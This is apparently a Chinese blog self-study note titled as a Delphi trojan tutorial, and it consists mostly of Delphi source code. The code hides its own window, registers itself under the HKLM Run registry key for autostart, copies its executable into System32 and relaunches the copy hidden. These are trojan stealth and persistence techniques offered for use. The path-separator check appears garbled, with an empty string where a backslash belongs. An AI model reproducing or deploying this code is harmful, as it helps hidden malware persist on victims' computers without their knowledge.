delphi 之木马自身复制加开机启动项『dephi自学笔记』

                                     delphi 之木马自身复制加开机启动项


interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, Registry, StdCtrls;

type
  TForm1 = class(TForm)
  procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

function GetWinDir: String;        //定义获取system32目录的方法。
var
Buf: array[0..MAX_PATH] of char;
begin
GetSystemDirectory(Buf, MAX_PATH);
Result := Buf;
if Result[Length(Result)]<>'' then Result := Result + '';
end;
{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
var myname: string;
    AuToRun :TRegistry;
begin
  Form1.Hide;
  Application.ShowMainForm := False;      //这两句是为了让程序运行不显示窗口。
  AuToRun := TRegistry.Create;
  with AuToRun do
  Try
    RootKey := HKEY_LOCAL_MACHINE;
    if OpenKey('SOFTWARE\MicroSoft\Windows\CurrentVersion\Run',false) then
    AuToRun.WriteString(extractfilename(application.ExeName),application.ExeName);
  Finally
  AuToRun.Free;
  end; //增加开机启动项

myname := ExtractFilename(Application.Exename); //获得文件名
if application.Exename <> GetWindir + myname then //如果文件不是在Windows\System32\那么..
begin
copyfile(pchar(application.Exename), pchar(GetWindir + myname), False);{将自己拷贝到Windows\System32\下}
Winexec(pchar(GetWindir + myname), sw_hide); //运行Windows\System32\下的新文件
end;
end;

end. 

转载文章请标明:该文章转自 罗斌原创技术文章:http://luobin44.51.com 〖罗斌原创〗

你可能感兴趣的:(Delphi,木马自身复制,delphi注册表加开机启动项,delphi木马开机启动,delphi复制自己)